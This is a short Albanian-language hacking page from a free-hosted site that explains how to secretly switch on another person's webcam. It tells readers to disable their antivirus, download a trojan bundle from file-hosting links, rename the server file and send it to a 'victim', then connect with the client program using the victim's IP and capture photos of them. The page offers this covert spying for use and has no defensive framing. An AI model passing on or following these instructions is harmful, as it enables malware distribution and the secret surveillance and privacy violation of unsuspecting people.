www.dardana.tk.......ju uron festat
  lëshoja dikujt cam
 

Lshoja Dikuj Cam

  si Tja Lshojm Dikuj Kameren Pa E Ditur ai -------------------------------------------------------------------------------- Ky Program Permban Trojan Si Qdo Program Per Hack. Dhe Duhet Tja Dini IP Viktimës Vazhdojm... Së Pari e Nalni Antivirusin Pastaj Shkarkone Ket File. Kodi: http://rapidshare.com/files/18878207...       jan_Hacker.zip ose Kodi: http://www.mediafire.com/?jjtdmi5ttge     Pastaj Filen Me Emrin Server ja Ndryshoni emrin ja leni qysh doni ju dhe ja dergoni Viktimes si te hap aj activizohet edhe tash shkojm te Programi Client Shenojm IP edhe presim pak kur te lidhet Shkruan Conected pastaj klikon Start Capture edhe fillon me i bo foto ViktimesKommentar zu dieser Seite hinzufügen:
Dein Name:
Deine Homepage:
Deine Nachricht:

 
  sod ishin 1070565 Besucher (5972939 Hits) ne dardana.tk
. .
 
 
Diese Webseite wurde kostenlos mit Homepage-Baukasten.de erstellt. Willst du auch eine eigene Webseite?
Gratis anmelden